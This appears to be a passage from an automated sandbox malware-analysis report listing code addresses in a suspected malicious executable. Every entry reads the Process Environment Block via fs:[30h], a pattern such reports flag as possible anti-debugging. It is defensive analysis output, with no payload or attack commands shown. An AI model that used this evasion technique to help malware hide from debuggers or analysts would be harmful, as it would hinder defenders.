    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE7410 mov eax, dword ptr fs:[00000030h]4_2_36DE7410
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8340D mov eax, dword ptr fs:[00000030h]4_2_36D8340D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D895DA mov eax, dword ptr fs:[00000030h]4_2_36D895DA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD5D0 mov eax, dword ptr fs:[00000030h]4_2_36DDD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD5D0 mov ecx, dword ptr fs:[00000030h]4_2_36DDD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D955C0 mov eax, dword ptr fs:[00000030h]4_2_36D955C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E355C9 mov eax, dword ptr fs:[00000030h]4_2_36E355C9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815F4 mov eax, dword ptr fs:[00000030h]4_2_36D815F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]4_2_36E335D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]4_2_36E335D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E335D7 mov eax, dword ptr fs:[00000030h]4_2_36E335D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEB594 mov eax, dword ptr fs:[00000030h]4_2_36DEB594
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEB594 mov eax, dword ptr fs:[00000030h]4_2_36DEB594
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E335B6 mov eax, dword ptr fs:[00000030h]4_2_36E335B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]4_2_36D5758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]4_2_36D5758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5758F mov eax, dword ptr fs:[00000030h]4_2_36D5758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F5BE mov eax, dword ptr fs:[00000030h]4_2_36E1F5BE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]4_2_36DF35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]4_2_36DF35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]4_2_36DF35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF35BA mov eax, dword ptr fs:[00000030h]4_2_36DF35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F5B0 mov eax, dword ptr fs:[00000030h]4_2_36D8F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DFD5B0 mov eax, dword ptr fs:[00000030h]4_2_36DFD5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DFD5B0 mov eax, dword ptr fs:[00000030h]4_2_36DFD5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]4_2_36D815A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]4_2_36D815A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]4_2_36D815A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]4_2_36D815A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D815A9 mov eax, dword ptr fs:[00000030h]4_2_36D815A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9B570 mov eax, dword ptr fs:[00000030h]4_2_36D9B570
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9B570 mov eax, dword ptr fs:[00000030h]4_2_36D9B570
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]4_2_36E0B550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]4_2_36E0B550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B550 mov eax, dword ptr fs:[00000030h]4_2_36E0B550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B562 mov eax, dword ptr fs:[00000030h]4_2_36D5B562
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]4_2_36E0F525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B52F mov eax, dword ptr fs:[00000030h]4_2_36E1B52F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35537 mov eax, dword ptr fs:[00000030h]4_2_36E35537
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97505 mov eax, dword ptr fs:[00000030h]4_2_36D97505
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97505 mov ecx, dword ptr fs:[00000030h]4_2_36D97505
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]4_2_36D6D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D530 mov eax, dword ptr fs:[00000030h]4_2_36D9D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D530 mov eax, dword ptr fs:[00000030h]4_2_36D9D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E352E2 mov eax, dword ptr fs:[00000030h]4_2_36E352E2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F2D0 mov eax, dword ptr fs:[00000030h]4_2_36D8F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F2D0 mov eax, dword ptr fs:[00000030h]4_2_36D8F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B2F0 mov eax, dword ptr fs:[00000030h]4_2_36E0B2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B2F0 mov eax, dword ptr fs:[00000030h]4_2_36E0B2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D692C5 mov eax, dword ptr fs:[00000030h]4_2_36D692C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D692C5 mov eax, dword ptr fs:[00000030h]4_2_36D692C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F2F8 mov eax, dword ptr fs:[00000030h]4_2_36E1F2F8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D592FF mov eax, dword ptr fs:[00000030h]4_2_36D592FF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9329E mov eax, dword ptr fs:[00000030h]4_2_36D9329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9329E mov eax, dword ptr fs:[00000030h]4_2_36D9329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35283 mov eax, dword ptr fs:[00000030h]4_2_36E35283
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov eax, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov eax, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov ecx, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov ecx, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF72A0 mov eax, dword ptr fs:[00000030h]4_2_36DF72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF72A0 mov eax, dword ptr fs:[00000030h]4_2_36DF72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2D26B mov eax, dword ptr fs:[00000030h]4_2_36E2D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2D26B mov eax, dword ptr fs:[00000030h]4_2_36E2D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9724D mov eax, dword ptr fs:[00000030h]4_2_36D9724D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59240 mov eax, dword ptr fs:[00000030h]4_2_36D59240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59240 mov eax, dword ptr fs:[00000030h]4_2_36D59240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA1270 mov eax, dword ptr fs:[00000030h]4_2_36DA1270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA1270 mov eax, dword ptr fs:[00000030h]4_2_36DA1270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D89274 mov eax, dword ptr fs:[00000030h]4_2_36D89274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B256 mov eax, dword ptr fs:[00000030h]4_2_36E1B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B256 mov eax, dword ptr fs:[00000030h]4_2_36E1B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35227 mov eax, dword ptr fs:[00000030h]4_2_36E35227
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97208 mov eax, dword ptr fs:[00000030h]4_2_36D97208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97208 mov eax, dword ptr fs:[00000030h]4_2_36D97208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F3E6 mov eax, dword ptr fs:[00000030h]4_2_36E1F3E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E353FC mov eax, dword ptr fs:[00000030h]4_2_36E353FC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B3D0 mov ecx, dword ptr fs:[00000030h]4_2_36E1B3D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB739A mov eax, dword ptr fs:[00000030h]4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB739A mov eax, dword ptr fs:[00000030h]4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D933A0 mov eax, dword ptr fs:[00000030h]4_2_36D933A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D933A0 mov eax, dword ptr fs:[00000030h]4_2_36D933A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D833A5 mov eax, dword ptr fs:[00000030h]4_2_36D833A5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3539D mov eax, dword ptr fs:[00000030h]4_2_36E3539D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59353 mov eax, dword ptr fs:[00000030h]4_2_36D59353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59353 mov eax, dword ptr fs:[00000030h]4_2_36D59353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F367 mov eax, dword ptr fs:[00000030h]4_2_36E1F367
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E03370 mov eax, dword ptr fs:[00000030h]4_2_36E03370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D34C mov eax, dword ptr fs:[00000030h]4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D34C mov eax, dword ptr fs:[00000030h]4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35341 mov eax, dword ptr fs:[00000030h]4_2_36E35341
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2132D mov eax, dword ptr fs:[00000030h]4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2132D mov eax, dword ptr fs:[00000030h]4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D57330 mov eax, dword ptr fs:[00000030h]4_2_36D57330
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F32A mov eax, dword ptr fs:[00000030h]4_2_36D8F32A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D890DB mov eax, dword ptr fs:[00000030h]4_2_36D890DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD0C0 mov eax, dword ptr fs:[00000030h]4_2_36DDD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD0C0 mov eax, dword ptr fs:[00000030h]4_2_36DDD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E350D9 mov eax, dword ptr fs:[00000030h]4_2_36E350D9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D850E4 mov eax, dword ptr fs:[00000030h]4_2_36D850E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D850E4 mov ecx, dword ptr fs:[00000030h]4_2_36D850E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D65096 mov eax, dword ptr fs:[00000030h]4_2_36D65096
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9909C mov eax, dword ptr fs:[00000030h]4_2_36D9909C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D090 mov eax, dword ptr fs:[00000030h]4_2_36D8D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D090 mov eax, dword ptr fs:[00000030h]4_2_36D8D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D08D mov eax, dword ptr fs:[00000030h]4_2_36D5D08D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DED080 mov eax, dword ptr fs:[00000030h]4_2_36DED080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DED080 mov eax, dword ptr fs:[00000030h]4_2_36DED080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35060 mov eax, dword ptr fs:[00000030h]4_2_36E35060
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B052 mov eax, dword ptr fs:[00000030h]4_2_36D8B052
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov ecx, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD070 mov ecx, dword ptr fs:[00000030h]4_2_36DDD070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE106E mov eax, dword ptr fs:[00000030h]4_2_36DE106E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0705E mov ebx, dword ptr fs:[00000030h]4_2_36E0705E
